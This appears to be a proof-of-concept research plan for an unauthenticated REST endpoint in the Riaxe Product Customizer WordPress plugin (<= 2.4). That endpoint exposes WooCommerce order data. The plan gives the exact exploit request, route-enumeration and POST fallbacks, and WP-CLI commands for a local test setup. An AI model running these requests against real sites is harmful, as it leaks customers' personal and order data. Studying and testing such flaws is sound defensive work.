Riaxe Product Customizer <= 2.4 - Unauthenticated Sensitive Information Disclosure via '/orders' REST API Endpoint

This research plan outlines the technical steps required to demonstrate the unauthenticated sensitive information disclosure vulnerability in the Riaxe Product Customizer plugin.

1. Vulnerability Summary

The Riaxe Product Customizer plugin (<= 2.4) registers a custom WordPress REST API endpoint /wp-json/InkXEProductDesignerLite/orders intended to retrieve order data. However, the permission_callback for this route is set to __return_true, which bypasses WordPress's built-in authentication and authorization mechanisms. Consequently, any unauthenticated user can query the endpoint to retrieve sensitive WooCommerce order details, including customer names, IDs, order totals, and statuses.

2. Attack Vector Analysis

• Endpoint: /wp-json/InkXEProductDesignerLite/orders
• HTTP Method: GET (inferred)
• Authentication: None required (permission_callback is __return_true).
• Payload: No specific payload required; a simple GET request triggers the data leak.
• Preconditions:
  1. The plugin "Riaxe Product Customizer" must be active.
  2. WooCommerce must be installed and have existing order data for the exposure to be impactful.

3. Code Flow (Inferred)

1. Hook Registration: The plugin likely uses the rest_api_init hook to register its API routes.
2. Route Definition: Inside the registration function, register_rest_route is called:

   register_rest_route('InkXEProductDesignerLite', '/orders', array(
       'methods'             => 'GET', // or WP_REST_Server::READABLE
       'callback'            => array($this, 'get_all_orders'), // (inferred callback name)
       'permission_callback' => '__return_true', // THE VULNERABILITY
   ));
   

3. Data Retrieval: The callback function queries the WooCommerce orders (likely using wc_get_orders or a direct global $wpdb query on wp_posts and wp_postmeta).
4. Data Output: The function returns a WP_REST_Response containing an array of order objects, which WordPress serializes into JSON.

4. Nonce Acquisition Strategy

According to the vulnerability description, the permission_callback is set to __return_true. In the WordPress REST API, when a route is configured this way, no X-WP-Nonce header or cookie-based authentication is required to access the endpoint.

If the environment configuration or a security plugin later enforced a global REST nonce requirement, the nonce for the wp_rest action would be needed. However, for a standard PoC of this specific vulnerability, no nonce is expected to be necessary.

5. Exploitation Strategy

The exploitation involves a direct request to the exposed REST endpoint.

• Step 1: Verify the endpoint exists and is reachable.
• Step 2: Send a GET request to the target.
• Step 3: Parse the JSON response to confirm the presence of customer names and order totals.

HTTP Request (via http_request tool):

GET /wp-json/InkXEProductDesignerLite/orders HTTP/1.1
Host: localhost:8080
Accept: application/json

6. Test Data Setup

To verify the disclosure, mock data must exist in the WooCommerce system.

1. Install/Activate Riaxe Product Customizer: Ensure version <= 2.4 is installed.
2. Install/Activate WooCommerce: The plugin depends on WooCommerce data.
3. Create a Customer User:

   wp user create victim_customer victim@example.com --role=customer --user_pass=password123
   

4. Create Mock Orders: Use WP-CLI to generate an order (requires WooCommerce CLI support or manual DB insertion).

   # Alternative: Use a PHP script via wp eval to create an order
   wp eval '
   $order = wc_create_order();
   $order->set_billing_first_name("John");
   $order->set_billing_last_name("Doe");
   $order->set_total(99.99);
   $order->set_status("completed");
   $order->save();
   '
   

7. Expected Results

A successful exploit will return a 200 OK status and a JSON body containing an array of order objects.

Example Response Body:

[
  {
    "order_id": 123,
    "customer_id": 5,
    "first_name": "John",
    "last_name": "Doe",
    "order_total": "99.99",
    "order_date": "2023-10-27 10:00:00",
    "currency": "USD",
    "status": "completed"
  }
]

8. Verification Steps

1. Identify Order in Database:

   wp db query "SELECT ID, post_status FROM wp_posts WHERE post_type='shop_order' LIMIT 1;"
   

2. Compare API Output: Match the order_id and order_total from the HTTP response with the data returned by the CLI command:

   wp post get <ID> --field=post_title
   # and
   wp post meta get <ID> _order_total
   

3. Check Sensitivity: Confirm that the first_name and last_name returned by the API match the billing information of the user associated with that order.

9. Alternative Approaches

If the /orders endpoint is not found, it is possible the namespace or route suffix varies slightly between minor versions.

1. Enumerate Routes: Request the main REST index to discover the exact path:

   GET /wp-json/
   

   Then search the response for "InkXE".
2. Check for POST: If GET returns a 405 Method Not Allowed, try a POST request with an empty body:

   POST /wp-json/InkXEProductDesignerLite/orders HTTP/1.1
   Content-Length: 0
   

3. Examine Sub-directories: If the plugin follows a different naming convention, grep the source code for register_rest_route to find the exact string:

   grep -rn "register_rest_route" wp-content/plugins/riaxe-product-customizer/